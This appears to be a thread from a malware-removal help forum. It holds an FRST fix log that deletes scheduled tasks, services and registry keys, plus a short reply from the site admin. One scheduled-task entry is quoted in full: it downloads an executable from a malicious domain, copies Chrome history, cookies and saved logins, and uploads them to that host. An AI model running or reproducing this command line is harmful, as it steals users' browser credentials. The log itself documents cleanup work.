CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC

EmptyTemp:
End
*****************

Processes closed successfully.
HKLM\SOFTWARE\Policies\Google => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C093763-EE42-49CF-8891-F189A4AB542C}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C093763-EE42-49CF-8891-F189A4AB542C}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{326F35B1-9030-43D1-BD0D-5DBD49CECAFF}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{326F35B1-9030-43D1-BD0D-5DBD49CECAFF}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => removed successfully
http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION => Error: No automatic fix found for this entry.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{74344F07-42C6-4622-9312-152A6B0AECFF}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{74344F07-42C6-4622-9312-152A6B0AECFF}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FF6375C1-1AC9-466C-80D7-F1443D3F6986}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FF6375C1-1AC9-466C-80D7-F1443D3F6986}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => removed successfully
HKLM\System\CurrentControlSet\Services\tmlwf => removed successfully
tmlwf => service removed successfully
HKLM\System\CurrentControlSet\Services\tmwfp => removed successfully
tmwfp => service removed successfully
"C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA" => not found
"C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore" => not found
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652} => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE} => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E} => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67} => removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => value restored successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => removed successfully
"HKU\S-1-5-21-1878501408-2484808434-785971923-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => removed successfully

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 39858649 B
Java, Flash, Steam htmlcache => 75 B
Windows/system/drivers => 353557217 B
Edge => 0 B
Chrome => 8015508 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 83565 B
systemprofile32 => 149793 B
LocalService => 216501 B
NetworkService => 1692181 B
PC => 4805834241 B

RecycleBin => 1908484100 B
EmptyTemp: => 6.6 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 21:10:35 ====

Rudy
Site Admin
Posts: 118199
Registered: 30 Oct 2003 13:42
Location: Plzeň

Re: invalid certificates in browsers

#9 Post by Rudy »

Deleted. Has anything changed?